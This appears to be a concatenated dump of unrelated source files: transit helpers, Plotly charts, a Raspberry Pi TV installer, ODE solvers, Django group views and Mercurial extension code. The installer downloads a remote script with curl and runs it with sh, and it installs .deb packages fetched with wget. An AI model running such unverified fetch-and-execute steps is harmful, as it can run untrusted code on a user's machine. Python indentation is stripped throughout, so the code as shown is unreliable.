def split(x):
y = x.split(":")[0:3]
return ":".join(y)
stop_id_series = stop_id_series.apply(split)
if len(stop_id_series.unique()) == 1:
unique_stop_id = stop_id_series.unique()[0]
else:
ValueError("Cannot found unique id")
return unique_stop_id
def convert_stop_id_for_request(stop_id):
"""Convert stop_id to format for REST request
"""
string_as_list = stop_id.split(":")
string_as_list[1] = str(int(string_as_list[1]))
string_as_list[2] = str(int(string_as_list[2]))
return ":".join(string_as_list)
def request_stop_id_by_name(name):
"""Do a REST request do get stop_id by stop name
"""
request_string = create_request_string(request_type = "stops_by_name", name=name)
response = kvv_request(request_string)
return response["stops"][0]["id"]
def search_for_stop_id_by_name(name):
"""Do a REST request do for searching a stop_id by inserting only fragment
"""
request_string = create_request_string(request_type = "stops_by_name", name=name)
response = kvv_request(request_string)
return response["stops"]
``` |
{
"source": "jns-rch/whatsapp-analytics",
"score": 4
} |
#### File: jns-rch/whatsapp-analytics/plotly_plots.py
```python
import plotly.express as px
from plotly.subplots import make_subplots
class Plotter():
def __init__(self, title_x=0.5, title_font_size=24, font_size=14, template='plotly_white',
autosize=True, margin={"l":0, "r":0, "t":120, "b":0},
color_discrete_sequence=px.colors.qualitative.T10):
self.title_x = title_x
self.title_font_size = title_font_size
self.font_size = font_size
self.template = template
self.autosize = autosize
self.color_discrete_sequence = color_discrete_sequence
self.margin = margin
def standardize_plot(self, fig):
fig.update_layout(title_font_size=self.title_font_size,
title_x=self.title_x,
font_size=self.font_size,
template=self.template,
autosize=self.autosize,
margin=self.margin,
legend={"orientation":"h", "y":-0.3}
)
return fig
def barplot(self, data, x, y, color=None, barmode=None, title_text=None,
legend_title_text=None, xaxis_title=None, yaxis_title=None,
xtickvals=None, ytickvals=None, xtickangle=None, ytickangle=None):
fig = px.bar(data_frame=data, x=x, y=y, color=color, barmode=barmode,
color_discrete_sequence=self.color_discrete_sequence)
fig = fig.update_xaxes(tickvals=xtickvals, tickangle=xtickangle)
fig = fig.update_yaxes(tickvals=ytickvals, tickangle=ytickangle)
fig = fig.update_layout(title_text=title_text, legend_title_text=legend_title_text,
xaxis_title=xaxis_title, yaxis_title=yaxis_title)
fig = self.standardize_plot(fig)
return fig
def pieplot(self, data, values, names, color=None, title_text=None,
legend_title_text=None):
fig = px.pie(data_frame=data, values=values, names=names, color=color,
color_discrete_sequence=self.color_discrete_sequence)
fig = fig.update_layout(title_text=title_text, legend_title_text=legend_title_text)
fig = self.standardize_plot(fig)
return fig
def histogram(self, data, x, color=None, title_text=None, legend_title_text=None,
xaxis_title=None, yaxis_title=None, xtickvals=None, ytickvals=None,
xtickangle=None, ytickangle=None):
fig = px.histogram(data_frame=data, x=x, color=color,
color_discrete_sequence = self.color_discrete_sequence)
fig = fig.update_xaxes(tickvals=xtickvals, tickangle=xtickangle)
fig = fig.update_yaxes(tickvals=ytickvals, tickangle=ytickangle)
fig = fig.update_layout(title_text=title_text, legend_title_text=legend_title_text,
xaxis_title=xaxis_title, yaxis_title=yaxis_title)
fig = self.standardize_plot(fig)
return fig
def boxplot(self, data, x=None, y=None, color=None, title_text=None, legend_title_text=None,
xaxis_title=None, yaxis_title=None, xtickvals=None, ytickvals=None,
xtickangle=None, ytickangle=None):
fig = px.box(data, x, y, color=color,
color_discrete_sequence = self.color_discrete_sequence)
fig = fig.update_xaxes(tickvals=xtickvals, tickangle=xtickangle)
fig = fig.update_yaxes(tickvals=ytickvals, tickangle=ytickangle)
fig = fig.update_layout(title_text=title_text, legend_title_text=legend_title_text,
xaxis_title=xaxis_title, yaxis_title=yaxis_title)
fig = self.standardize_plot(fig)
return fig
def lineplot(self, data, x, y, color=None, title_text=None, legend_title_text=None,
xaxis_title=None, yaxis_title=None, xtickvals=None, ytickvals=None,
xtickangle=None, ytickangle=None):
fig = px.line(data_frame=data, x=x, y=y, color=color,
color_discrete_sequence=self.color_discrete_sequence)
fig = fig.update_xaxes(tickvals=xtickvals, tickangle=xtickangle)
fig = fig.update_yaxes(tickvals=ytickvals, tickangle=ytickangle)
fig = fig.update_layout(title_text=title_text, legend_title_text=legend_title_text,
xaxis_title=xaxis_title, yaxis_title=yaxis_title)
fig = self.standardize_plot(fig)
return fig
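# Hypothetical usage sketch (added): the DataFrame and column names are illustrative
# assumptions, not data from the original WhatsApp analytics project.
if __name__ == "__main__":
    import pandas as pd
    demo = pd.DataFrame({"sender": ["Alice", "Bob", "Alice"], "messages": [10, 7, 3]})
    plotter = Plotter()
    fig = plotter.barplot(demo, x="sender", y="messages",
                          title_text="Messages per sender",
                          xaxis_title="Sender", yaxis_title="Messages")
    fig.show()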
``` |
{
"source": "jnstockley/raspberrypi-smart-tv",
"score": 2
} |
#### File: jnstockley/raspberrypi-smart-tv/installer.py
```python
import os
# System update of Pi
def updatePi():
os.system("sudo apt update && sudo apt upgrade -y")
# Install required dependencies
def dependencies():
os.system("sudo apt install python3 steamlink -y")
# Install python dependencies
def pythonDependencies():
os.system("pip3 install pynput flask")
os.system("pip3 install -U flask_cors")
# Install media browser
def mediaBrowser():
os.system("curl -fsSL https://pi.vpetkov.net -o ventz-media-pi")
os.system("sh ventz-media-pi")
# Install PiTV
def installPiTV():
os.system("mkdir /home/pi/PiTV")
os.system("wget https://raw.githubusercontent.com/jnstockley/PiTV/master/PiTV.py")
os.system("mv /home/pi/PiTV.py /home/pi/PiTV")
# Install Unified Remote Server (if selected)
def urServerInstall():
os.system("cd ~")
os.system("wget -O urserver.deb http://www.unifiedremote.com/d/rpi-deb")
os.system("sudo dpkg -i urserver.deb")
# Run Unified Remote Server (if selected)
def runUrserver():
os.system("/opt/urserver/urserver-start")
# Install Parsec Gaming (if selected and supported)
def parsecInstall():
piV = os.popen("cat /proc/cpuinfo | grep Model").read()
if("Pi 4" not in piV):
os.system("wget https://s3.amazonaws.com/parsec-build/package/parsec-rpi.deb")
os.system("sudo dpkg -i parsec-rpi.deb")
else:
print("Parsec is not yet supported on your Raspberry Pi!")
# Install basic webUI (if selected)
def webUIInstall():
os.system("sudo apt install apache2 -y")
os.system("sudo chown pi:pi /var/www/html/")
os.system("mkdir /var/www/html/PiTV/")
os.system("wget https://raw.githubusercontent.com/jnstockley/PiTV/master/web/main.js")
os.system("wget https://raw.githubusercontent.com/jnstockley/PiTV/master/web/index.html")
os.system("mv /home/pi/index.html /var/www/html/PiTV")
os.system("mv /home/pi/main.js /var/www/html/PiTV")
# Install the screensaver
def screensaverInstall():
os.system("wget https://raw.githubusercontent.com/jnstockley/PiTV/master/screensaver/index.html")
os.system("wget https://raw.githubusercontent.com/jnstockley/PiTV/master/screensaver/script.js")
os.system("wget https://raw.githubusercontent.com/jnstockley/PiTV/master/screensaver/settings.json")
os.system("wget https://raw.githubusercontent.com/jnstockley/PiTV/master/screensaver/style.css")
os.system("mkdir /var/www/html/screensaver")
os.system("mv /home/pi/index.html /var/www/html/screensaver")
os.system("mv /home/pi/script.js /var/www/html/screensaver")
os.system("mv /home/pi/settings.json /var/www/html/screensaver")
os.system("mv /home/pi/style.css /var/www/html/screensaver")
# Make PiTV start on boot
def autoStart():
os.system("mkdir /home/pi/.config/autostart || echo 'Autostart folder exists'")
os.system('echo "[Desktop Entry]\n\
Type=Application\n\
Name=PiTV\n\
Exec=/usr/bin/python3 /home/pi/PiTV/PiTV.py\
" >> /home/pi/.config/autostart/PiTV.desktop')
# Clean up unneeded files
def cleanUp():
os.system("rm /home/pi/urserver.deb")
os.system("rm /home/pi/installer.py")
# Prompt for reboot
def reboot():
reboot = input("Would you like to reboot now? (Y/N): ")
if("y" in reboot or "Y" in reboot):
os.system("sudo reboot")
else:
print("Please reboot your Raspberry Pi before runnig PiTV!")
# Runs the program
if __name__ == '__main__':
urserver = input("Do you want to install Unified Remote Server? (Y/N): ")
webUI = input("Do you want to install the Web UI? (Y/N): ")
parsec = input("Do you want to install Parsec? (Pi 3 supported only) (Y/N): ")
updatePi()
dependencies()
pythonDependencies()
mediaBrowser()
installPiTV()
if"y" in parsec or "Y" in parsec:
parsecInstall()
if"y" in urserver or "Y" in urserver:
urServerInstall()
if"y" in webUI or "Y" in webUI:
webUIInstall()
autoStart()
if"y" in urserver or "Y" in urserver:
runUrserver()
screensaverInstall()
cleanUp()
reboot()
``` |
{
"source": "jnsxlx/ODE",
"score": 3
} |
#### File: jnsxlx/ODE/ODE.py
```python
import numpy as np
from scipy import integrate
from mpl_toolkits.mplot3d import axes3d
import matplotlib.pyplot as plt
import scipy.linalg as la
###Forward Euler Method
##delta_t 0.0012
delta_x = 0.05
delta_t = 0.0012
x_eval = np.arange(0.0, 1.0 + delta_x, delta_x)
t_eval = np.arange(0.0, 0.06 + delta_t, delta_t)
ratio = delta_t / (delta_x**2.0)
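# Note (added): the explicit update U[k+1,i] = U[k,i] + r*(U[k,i+1] - 2*U[k,i] + U[k,i-1])
# is stable for the heat equation only when r = delta_t/delta_x**2 <= 0.5.
# Here r = 0.0012/0.05**2 = 0.48, so the solution stays bounded; the 0.0013 case
# below gives r = 0.52 and blows up.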
X, T = np.meshgrid(x_eval, t_eval)
U = np.zeros(X.shape)
for i in range(0,len(x_eval)):
if x_eval[i] < 0.5:
U[0,i] = 2.0 * x_eval[i]
else:
U[0,i] = 2.0 - 2.0 * x_eval[i]
for k in range(0, len(t_eval) - 1):
for i in range(1,len(x_eval) - 1):
U[k + 1, i] = U[k, i] + ratio * (U[k, i + 1] - 2.0 * U[k, i] + U[k, i - 1])
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot_wireframe(T, X, U, rstride = 10, cstride=1)
plt.title('Forward Euler Method with Delta t 0.0012')
plt.xlabel('t')
plt.ylabel('x')
plt.xlim([0, 0.06])
plt.ylim([0, 1.0])
##delta_t 0.0013
delta_t = 0.0013
t_eval = np.arange(0.0, 0.06+delta_t, delta_t)
ratio = delta_t / (delta_x**2.0)
X, T = np.meshgrid(x_eval, t_eval)
U = np.zeros(X.shape)
for i in range(0, len(x_eval)):
if x_eval[i] < 0.5:
U[0,i] = 2.0 * x_eval[i]
else:
U[0,i] = 2.0 - 2.0 * x_eval[i]
for k in range(0,len(t_eval) - 1):
for i in range(1,len(x_eval) - 1):
U[k + 1, i] = U[k,i] + ratio * (U[k, i + 1] - 2.0 * U[k, i] + U[k, i - 1])
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot_wireframe(T, X, U, rstride = 10, cstride=1)
plt.title('Forward Euler Method with Delta t 0.0013')
plt.xlabel('t')
plt.ylabel('x')
plt.xlim([0,0.06])
plt.ylim([0,1.0])
###Backward Euler method
##delta_t 0.005
delta_t = 0.005
t_eval = np.arange(0.0, 0.06 + delta_t, delta_t)
ratio = delta_t / (delta_x**2.0)
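# Note (added): the implicit scheme solves (I - r*A) u^{k+1} = u^k at every step and is
# unconditionally stable, so the much larger step delta_t = 0.005 (r = 2.0) still works.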
X, T = np.meshgrid(x_eval, t_eval)
U = np.zeros(X.shape)
for i in range(0,len(x_eval)):
if (x_eval[i] < 0.5):
U[0,i] = 2.0 * x_eval[i]
else:
U[0,i] = 2.0 - 2.0 * x_eval[i]
A = -2.0 * np.eye(len(x_eval)) + 1.0 * np.eye(len(x_eval), k=1) + 1.0 * np.eye(len(x_eval), k = -1)
A[0, :] = 0
A[:, 0] = 0
A[-1, :] = 0
A[:, -1] = 0
I = np.eye(len(x_eval))
for k in range(0, len(t_eval) - 1):
U[k+1, :] = la.solve(I - ratio * A, U[k, :])
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot_wireframe(T, X, U, rstride = 1, cstride=1)
plt.title('Backward Euler method with Delta t 0.005')
plt.xlabel('t')
plt.ylabel('x')
plt.xlim([0, 0.06])
plt.ylim([0, 1.0])
###crank-nicolson
##delta_t 0.005
ratio = delta_t / (2.0 * (delta_x**2.0))
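# Note (added): Crank-Nicolson averages the explicit and implicit updates,
# (I - r*A) u^{k+1} = (I + r*A) u^k with r = delta_t/(2*delta_x**2); it is likewise
# unconditionally stable and second-order accurate in time.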
for k in range(0,len(t_eval)-1):
U[k + 1, :] = la.solve(I - ratio * A, np.dot(U[k, :], I + ratio * A))
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot_wireframe(T, X, U, rstride = 1, cstride=1)
plt.title('Crank-Nicolson with Delta t 0.005')
plt.xlabel('t')
plt.ylabel('x')
plt.xlim([0, 0.06])
plt.ylim([0, 1.0])
###finite difference
ratio = 1.0 / (delta_x**2.0)
def func(y, t):
return ratio * np.dot(A,y)
dt = 1.0e-3
y_t = np.arange(0, 0.06 + dt, dt)
y_0 = np.zeros(x_eval.shape)
for i in range(0,len(x_eval)):
if (x_eval[i] < 0.5):
y_0[i] = 2.0 * x_eval[i]
else:
y_0[i] = 2.0 - 2.0 * x_eval[i]
X, T = np.meshgrid(x_eval, y_t)
sol = integrate.odeint(func, y_0, y_t)
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot_wireframe(T, X, sol, rstride = 10, cstride=1)
plt.title('Finite Difference Method')
plt.xlabel('t')
plt.ylabel('x')
plt.xlim([0,0.06])
plt.ylim([0,1.0])
plt.show()
``` |
{
"source": "jnsxlx/SVM",
"score": 3
} |
#### File: jnsxlx/SVM/test.py
```python
import unittest
import numpy as np
from model.self_multiclass import MulticlassSVM
class TestSklearn(unittest.TestCase):
def setUp(self):
self.X_train = TestSklearn.mnist[:len(TestSklearn.mnist)//2, 1:]
self.y_train = (TestSklearn.mnist[:len(TestSklearn.mnist)//2, 0]
.astype(np.int))
self.X_test = TestSklearn.mnist[len(TestSklearn.mnist)//2:, 1:]
self.y_test = (TestSklearn.mnist[len(TestSklearn.mnist)//2:, 0]
.astype(np.int))
@classmethod
def setUpClass(cls):
super(TestSklearn, cls).setUpClass()
print('Loading data...')
cls.mnist = np.loadtxt('data/mnist_test.csv', delimiter=',')
def test_score_shape(self):
msvm = MulticlassSVM('ovr')
msvm.fit(self.X_train, self.y_train)
scores = msvm.scores_ovr_student(self.X_test)
self.assertTrue(scores.shape[0] == 5000 and scores.shape[1] == 10)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jnsya/eahub.org",
"score": 2
} |
#### File: eahub/base/admin.py
```python
import django_admin_relation_links
from authtools import admin as authtools_admin
from django.contrib import admin
from rangefilter.filter import DateRangeFilter
from solo.admin import SingletonModelAdmin
from ..profiles import models as profiles_models
from . import models
@admin.register(models.User)
class UserAdmin(
django_admin_relation_links.AdminChangeLinksMixin, authtools_admin.UserAdmin
):
list_select_related = ["profile"]
list_display = [
"is_active",
"email",
"profile_link",
"is_profile_approved",
"date_joined",
"last_login",
"is_superuser",
"is_staff",
"is_profile_public",
]
change_links = ["profile"]
list_filter = [
"is_superuser",
"is_staff",
"is_active",
"profile__is_approved",
"profile__is_public",
("date_joined", DateRangeFilter),
("last_login", DateRangeFilter),
]
search_fields = ["email", "profile__name"]
actions = ["approve_profiles"]
def is_profile_approved(self, user):
profile = get_profile(user)
if profile is None:
return profile
return profile.is_approved
is_profile_approved.short_description = "Approved?"
is_profile_approved.boolean = True
def approve_profiles(self, request, queryset):
profiles_models.Profile.objects.filter(user__in=queryset).update(
is_approved=True
)
approve_profiles.short_description = "Approve selected users' profiles"
approve_profiles.allowed_permissions = ["change"]
def is_profile_public(self, user):
profile = get_profile(user)
if profile is None:
return profile
return profile.is_public
is_profile_public.short_description = "Public?"
is_profile_public.boolean = False
def get_profile(user):
try:
return user.profile
except profiles_models.Profile.DoesNotExist:
return None
@admin.register(models.MessagingLog)
class MessagingLogAdmin(admin.ModelAdmin):
list_display = [
"sender_email",
"recipient_email",
"recipient_type",
"send_action_uuid",
"time",
]
list_filter = [
"recipient_type",
("time", DateRangeFilter),
]
search_fields = ["sender", "recipient"]
admin.site.register(models.FeedbackURLConfig, SingletonModelAdmin)
```
#### File: eahub/localgroups/views.py
```python
import uuid
from django import urls
from django.conf import settings
from django.contrib import messages
from django.contrib.auth import mixins as auth_mixins
from django.contrib.auth.decorators import login_required
from django.contrib.sites.shortcuts import get_current_site
from django.core.exceptions import PermissionDenied
from django.core.mail import EmailMultiAlternatives, send_mail
from django.http import Http404
from django.shortcuts import get_object_or_404, redirect
from django.template.loader import render_to_string
from django.urls import reverse
from django.views.decorators.http import require_POST
from django.views.generic import detail as detail_views
from django.views.generic import edit as edit_views
from flags.state import flag_enabled
from rules.contrib import views as rules_views
from ..base.models import FeedbackURLConfig, MessagingLog
from ..base.utils import get_admin_email
from ..base.views import ReportAbuseView, SendMessageView
from ..profiles.models import Profile
from .forms import LocalGroupForm
from .models import LocalGroup
class LocalGroupCreateView(
auth_mixins.LoginRequiredMixin,
auth_mixins.PermissionRequiredMixin,
edit_views.CreateView,
):
model = LocalGroup
form_class = LocalGroupForm
template_name = "eahub/edit_group.html"
permission_required = "localgroups.create_local_group"
def get_initial(self):
initial = super().get_initial()
user = self.request.user
if hasattr(user, "profile"):
initial["organisers"] = [user]
return initial
def get_form_kwargs(self):
return {**super().get_form_kwargs(), "user": self.request.user}
def form_valid(self, form):
form.instance.geocode()
self.object = form.save()
send_mail_on_change(
self.request, "create_group.txt", self.object.name, self.object.slug
)
return super().form_valid(form)
class LocalGroupDetailView(detail_views.DetailView):
queryset = LocalGroup.objects.filter(is_public=True)
template_name = "eahub/group.html"
context_object_name = "group"
class LocalGroupUpdateView(rules_views.PermissionRequiredMixin, edit_views.UpdateView):
queryset = LocalGroup.objects.filter(is_public=True)
form_class = LocalGroupForm
template_name = "eahub/edit_group.html"
permission_required = "localgroups.change_local_group"
def get_form_kwargs(self):
return {**super().get_form_kwargs(), "user": self.request.user}
def form_valid(self, form):
if "city_or_town" in form.changed_data or "country" in form.changed_data:
form.instance.geocode()
old_name = self.object.name
self.object = form.save()
send_mail_on_change(
self.request, "update_group.txt", old_name, self.object.slug
)
return super().form_valid(form)
class LocalGroupDeleteView(rules_views.PermissionRequiredMixin, edit_views.DeleteView):
queryset = LocalGroup.objects.filter(is_public=True)
template_name = "eahub/delete_group.html"
permission_required = "localgroups.delete_local_group"
def delete(self, *args, **kwargs):
self.object = self.get_object()
name = self.object.name
slug = self.object.slug
self.object.delete()
send_mail_on_change(self.request, "delete_group.txt", name, slug)
return redirect(urls.reverse_lazy("groups"))
class ReportGroupAbuseView(ReportAbuseView):
def profile(self):
return LocalGroup.objects.get(slug=self.kwargs["slug"], is_public=True)
def get_type(self):
return "group"
class SendGroupMessageView(SendMessageView):
def get_recipient(self):
return LocalGroup.objects.get(slug=self.kwargs["slug"], is_public=True)
def form_valid(self, form):
message = form.cleaned_data["your_message"]
recipient = self.get_recipient()
sender_name = form.cleaned_data["your_name"]
subject = f"{sender_name} wants to connect with {recipient.name}!"
sender_email_address = form.cleaned_data["your_email_address"]
feedback_url = FeedbackURLConfig.get_solo().site_url
admins_email = get_admin_email()
txt_message = render_to_string(
"emails/message_group.txt",
{
"sender_name": sender_name,
"group_name": recipient.name,
"message": message,
"feedback_url": feedback_url,
"admins_email": admins_email,
},
)
html_message = render_to_string(
"emails/message_group.html",
{
"sender_name": sender_name,
"group_name": recipient.name,
"message": message,
"feedback_url": feedback_url,
"admins_email": admins_email,
},
)
recipient_emails = recipient.get_messaging_emails(self.request)
email = EmailMultiAlternatives(
subject=subject,
body=txt_message,
from_email=admins_email,
to=recipient_emails,
reply_to=[sender_email_address],
)
email.attach_alternative(html_message, "text/html")
email.send()
send_action_uuid = uuid.uuid4()
for recipient_email in recipient_emails:
log = MessagingLog(
sender_email=sender_email_address,
recipient_email=recipient_email,
recipient_type=MessagingLog.GROUP,
send_action_uuid=send_action_uuid,
)
log.save()
messages.success(
self.request, "Your message to " + recipient.name + " has been sent"
)
return redirect(reverse("group", args=([recipient.slug])))
def get(self, request, *args, **kwargs):
group = self.get_recipient()
if group.email or (
flag_enabled("MESSAGING_FLAG", request=request)
and group.has_organisers_with_messaging_enabled()
):
if not request.user.has_perm("profiles.message_users"):
raise PermissionDenied
return super().get(request, *args, **kwargs)
raise Http404("Messaging not available for this group")
def post(self, request, *args, **kwargs):
group = self.get_recipient()
if (
request.user.has_perm("profiles.message_users")
and group.email
or (
flag_enabled("MESSAGING_FLAG", request=request)
                and group.has_organisers_with_messaging_enabled()
)
):
return super().post(request, *args, **kwargs)
raise PermissionDenied
@login_required
@require_POST
def claim_group(request, slug):
group = get_object_or_404(LocalGroup, slug=slug, is_public=True)
subject = "EA Group claimed: {0}".format(group.name)
try:
user_eahub_url = "https://{0}/profile/{1}".format(
get_current_site(request).domain, request.user.profile.slug
)
user_name = request.user.profile.name
except Profile.DoesNotExist:
user_eahub_url = "about:blank"
user_name = request.user.email
message = render_to_string(
"emails/claim_group.txt",
{
"user_eahub_url": user_eahub_url,
"user_name": user_name,
"group_name": group.name,
"group_url": "https://{0}/group/{1}".format(
get_current_site(request).domain, group.slug
),
"user_email": request.user.email,
},
)
recipient_list = [email for email in settings.LEAN_MANAGERS]
recipient_list.append(settings.GROUPS_EMAIL)
send_mail(
subject, message, settings.DEFAULT_FROM_EMAIL, recipient_list=recipient_list
)
messages.success(
request,
"Thank you, we have received your request to claim this group. "
"Our admin team will send you an email once they have checked your request.",
)
return redirect("/group/{}".format(group.slug))
@login_required
@require_POST
def report_group_inactive(request, slug):
group = get_object_or_404(LocalGroup, slug=slug, is_public=True)
subject = "EA Group reported as inactive: {0}".format(group.name)
try:
user_eahub_url = "https://{0}/profile/{1}".format(
get_current_site(request).domain, request.user.profile.slug
)
except Profile.DoesNotExist:
user_eahub_url = "about:blank"
message = render_to_string(
"emails/report_group_inactive.txt",
{
"user_eahub_url": user_eahub_url,
"user_name": request.user.profile.name,
"group_name": group.name,
"group_url": "https://{0}/group/{1}".format(
get_current_site(request).domain, group.slug
),
"user_email": request.user.email,
},
)
send_mail(
subject,
message,
settings.DEFAULT_FROM_EMAIL,
recipient_list=settings.LEAN_MANAGERS,
)
messages.success(
request,
"Thank you, we have received your report. "
"Our admin team will send you an email once they have looked into it.",
)
return redirect("/group/{}".format(group.slug))
@login_required
@require_POST
def send_mail_on_change(request, template, name, slug):
if "update" in template:
action = "updated"
elif "create" in template:
action = "created"
elif "delete" in template:
action = "deleted"
else:
raise Exception("Template {0} does not exist".format(template))
subject = "EA Group {0}: {1}".format(action, name)
try:
user_eahub_url = "https://{0}/profile/{1}".format(
get_current_site(request).domain, request.user.profile.slug
)
user_name = request.user.profile.name
except Profile.DoesNotExist:
user_eahub_url = "about:blank"
user_name = request.user.email
message = render_to_string(
"emails/{0}".format(template),
{
"user_eahub_url": user_eahub_url,
"user_name": user_name,
"group_name": name,
"group_url": "https://{0}/group/{1}".format(
get_current_site(request).domain, slug
),
},
)
recipient_list = [email for email in settings.LEAN_MANAGERS]
recipient_list.append(settings.GROUPS_EMAIL)
send_mail(
subject, message, settings.DEFAULT_FROM_EMAIL, recipient_list=recipient_list
)
``` |
{
"source": "jnt999/NBAFantasyApp",
"score": 3
} |
#### File: jnt999/NBAFantasyApp/Player.py
```python
class Player:
#Creates a new player with the parameters set to the correct
#values
def __init__(self,firstname,lastname,pt,rb,ass):
        self._firstname = firstname #Player's first name
        self._lastname = lastname #Player's last name
self._pt = pt #Points per game
self._rb = rb #Rebounds per game
self._ass = ass #Assists per game
#Return the first name
@property
def firstname(self):
return self._firstname
#Return the last name
@property
def lastname(self):
return self._lastname
#Return the points per game
@property
def pt(self):
return self._pt
#Return the rebounds per game
@property
def rb(self):
return self._rb
#Return the assists
@property
def ass(self):
return self._ass
#Sets the first name
@firstname.setter
def firstname(self, firstname):
self._firstname = firstname
#Sets the last name
@lastname.setter
def lastname(self, lastname):
self._lastname = lastname
#Sets the points per game
@pt.setter
def pt(self, pt):
self._pt = pt
#Sets the rebounds
@rb.setter
def rb(self, rb):
self._rb = rb
#Sets the assists
@ass.setter
def ass(self, ass):
self._ass = ass
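# Hypothetical usage sketch (added; the stats are made-up example numbers):
if __name__ == "__main__":
    p = Player("LeBron", "James", 27.1, 7.5, 7.4)
    print(p.firstname, p.lastname, p.pt, p.rb, p.ass)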
``` |
{
"source": "jntaimo/ledchess",
"score": 3
} |
#### File: Reference/python/test_engine.py
```python
white = 8 # 1000
black = 16 # 10000
board = [
22, 20, 21, 23, 19, 21, 20, 22, 0, 0, 0, 0, 0, 0, 0, 0,
18, 18, 18, 18, 18, 18, 18, 18, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
9, 9, 9, 9, 9, 9, 9, 9, 0, 0, 0, 0, 0, 0, 0, 0,
14, 12, 13, 15, 11, 13, 12, 14, 0, 0, 0, 0, 0, 0, 0, 0,
]
notation = [
'a8', 'b8', 'c8', 'd8', 'e8', 'f8', 'g8', 'h8', 'i8', 'j8', 'k8', 'l8', 'm8', 'n8', 'o8', 'p8',
'a7', 'b7', 'c7', 'd7', 'e7', 'f7', 'g7', 'h7', 'i7', 'j7', 'k7', 'l7', 'm7', 'n7', 'o7', 'p7',
'a6', 'b6', 'c6', 'd6', 'e6', 'f6', 'g6', 'h6', 'i6', 'j6', 'k6', 'l6', 'm6', 'n6', 'o6', 'p6',
'a5', 'b5', 'c5', 'd5', 'e5', 'f5', 'g5', 'h5', 'i5', 'j5', 'k5', 'l5', 'm5', 'n5', 'o5', 'p5',
'a4', 'b4', 'c4', 'd4', 'e4', 'f4', 'g4', 'h4', 'i4', 'j4', 'k4', 'l4', 'm4', 'n4', 'o4', 'p4',
'a3', 'b3', 'c3', 'd3', 'e3', 'f3', 'g3', 'h3', 'i3', 'j3', 'k3', 'l3', 'm3', 'n3', 'o3', 'p3',
'a2', 'b2', 'c2', 'd2', 'e2', 'f2', 'g2', 'h2', 'i2', 'j2', 'k2', 'l2', 'm2', 'n2', 'o2', 'p2',
    'a1', 'b1', 'c1', 'd1', 'e1', 'f1', 'g1', 'h1', 'i1', 'j1', 'k1', 'l1', 'm1', 'n1', 'o1', 'p1',
]
move_offsets = [
15, 16, 17, 0, # black pawns
15, -16, -17, 0, # white pawns
1, 16, -1, -16, 0, # rooks
1, 16, -1, -16, 15, -15, 17, -17, 0, # queens, kings and bishops
14, -14, 18, -18, 31, -31, 33, -33, 0, # knights
3, -1, 12, 21, 16, 7, 12 # starting indices for each piece type in order
# white pawns, black pawns, kings, knights, bishops, rooks, queens
]
pieces = ".-pknbrq-P-KNBRQ"
def print_board():
index = 0
while index < 128:
# sq is on board
if(index & 0x88) == 0:
piece = board[index]
print(pieces[piece & 15], end=' ')
index += 1
else:
print()
index += 8
def search(side):
#move generator
index = 0
#loop over board squares
while index<128:
if (index & 0x88) == 0: #makes sure the piece is on the board
piece = board[index]
if piece & side: #if the piece is on the right side
piece_type = piece & 7
                directions = move_offsets[piece_type + 30] # +30 moves it to the starting indices in move_offsets
directions += 1
#loop over more offsets
while move_offsets[directions]:
step_vector = move_offsets[directions]
directions += 1
source_square = index
target_square = source_square
captured_piece = 0
# loop over slider ray
while captured_piece == 0:
target_square += step_vector
captured_square = target_square
if target_square & 0x88: #if it's off the board
break
captured_piece = board[captured_square]
if captured_piece & side: #can't capture your own pieces
break
if (piece_type < 3 and (not (step_vector & 7)) != (not captured_piece)):
break
#make move
board[captured_square] = 0
board[source_square] = 0
board[target_square] = piece
#pawn promotion
if piece_type < 3:
if (target_square + step_vector + 1 & 0x80):
board[target_square] |= 7
print_board()
#take back
board[target_square] = 0
board[source_square] = piece
board[captured_square] = captured_piece
#fake capture for leapers
captured_piece += (piece_type < 5)
#unfake capture for double pawn move
if (piece_type < 3 and (6 * side + (target_square & 0x70) == 0x80)):
captured_piece -= 1
index += 1
search(white)
``` |
{
"source": "jntesteves/protonfixes",
"score": 2
} |
#### File: protonfixes/gamefixes/1113000.py
```python
from protonfixes import util
def main():
""" installs devenum, quartz, wmp9 and adjust pulse latency
"""
# Fix pre-rendered cutscene playback
util.protontricks('xactengine3_7_ge')
util.protontricks('d3dx11_43_ge')
util.protontricks('d3dcompiler_43_ge')
util.protontricks('wmp9_ge')
util.protontricks('quartz')
util.protontricks('klite_ge')
util.set_environment('WINEDLLOVERRIDES','mfplay=n')
``` |
{
"source": "jnthn/intellij-community",
"score": 2
} |
#### File: hgext/largefiles/overrides.py
```python
import os
import copy
from mercurial import hg, commands, util, cmdutil, scmutil, match as match_, \
node, archival, error, merge, discovery
from mercurial.i18n import _
from mercurial.node import hex
from hgext import rebase
import lfutil
import lfcommands
import basestore
# -- Utility functions: commonly/repeatedly needed functionality ---------------
def installnormalfilesmatchfn(manifest):
'''overrides scmutil.match so that the matcher it returns will ignore all
largefiles'''
oldmatch = None # for the closure
def overridematch(ctx, pats=[], opts={}, globbed=False,
default='relpath'):
match = oldmatch(ctx, pats, opts, globbed, default)
m = copy.copy(match)
notlfile = lambda f: not (lfutil.isstandin(f) or lfutil.standin(f) in
manifest)
m._files = filter(notlfile, m._files)
m._fmap = set(m._files)
m._always = False
origmatchfn = m.matchfn
m.matchfn = lambda f: notlfile(f) and origmatchfn(f) or None
return m
oldmatch = installmatchfn(overridematch)
def installmatchfn(f):
oldmatch = scmutil.match
setattr(f, 'oldmatch', oldmatch)
scmutil.match = f
return oldmatch
def restorematchfn():
'''restores scmutil.match to what it was before installnormalfilesmatchfn
was called. no-op if scmutil.match is its original function.
Note that n calls to installnormalfilesmatchfn will require n calls to
restore matchfn to reverse'''
scmutil.match = getattr(scmutil.match, 'oldmatch', scmutil.match)
def addlargefiles(ui, repo, *pats, **opts):
large = opts.pop('large', None)
lfsize = lfutil.getminsize(
